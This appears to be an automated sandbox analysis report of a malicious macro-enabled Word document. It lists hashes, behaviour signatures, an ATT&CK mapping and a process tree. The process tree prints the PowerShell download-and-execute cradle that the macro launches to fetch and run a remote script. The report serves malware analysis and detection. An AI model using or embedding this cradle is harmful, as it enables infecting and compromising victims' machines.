Analysis

  • max time kernel
    108s
  • max time network
    74s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    22-11-2022 21:29

General

  • Target

    ce7d9b0734436d37674c5e9b91d67431.docm

  • Size

    17KB

  • MD5

    ce7d9b0734436d37674c5e9b91d67431

  • SHA1

    2ce909f8c0d4dc8b684743c4a45b335a79124e96

  • SHA256

    ed4ae4ef8a0e7a00159b884ae86154f6bf3d41a3911276eee795965735292456

  • SHA512

    ae6c4421bf9a3944b287b2266f3f184fdcba03a20a358ae25778c2f87ab09a26ac2ee66d9276303edb269f2a4313bf083693bf3673b6b7783eca2f63fee22b6b

  • SSDEEP

    384:Bnh0AtxoAKtkKERlcPNxt/ZtNNMNKuTVLa+0txyq3:BnuKuAKbSUxllNMl+ZsU

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.168.40.128/fund.txt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ce7d9b0734436d37674c5e9b91d67431.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe "IEX ((new-object net.webclient).downloadstring('http://192.168.40.128/fund.txt'))"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1720
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1476

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1476-70-0x0000000000000000-mapping.dmp
    • memory/1476-71-0x000007FEFC371000-0x000007FEFC373000-memory.dmp
      Filesize

      8KB

    • memory/1680-57-0x0000000075921000-0x0000000075923000-memory.dmp
      Filesize

      8KB

    • memory/1680-54-0x0000000072F11000-0x0000000072F14000-memory.dmp
      Filesize

      12KB

    • memory/1680-58-0x000000007197D000-0x0000000071988000-memory.dmp
      Filesize

      44KB

    • memory/1680-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1680-55-0x0000000070991000-0x0000000070993000-memory.dmp
      Filesize

      8KB

    • memory/1680-75-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1680-76-0x000000007197D000-0x0000000071988000-memory.dmp
      Filesize

      44KB

    • memory/1720-68-0x0000000000000000-mapping.dmp
    • memory/1720-72-0x000000006B100000-0x000000006B6AB000-memory.dmp
      Filesize

      5.7MB

    • memory/1720-73-0x000000006B100000-0x000000006B6AB000-memory.dmp
      Filesize

      5.7MB

    • memory/1720-74-0x000000006B100000-0x000000006B6AB000-memory.dmp
      Filesize

      5.7MB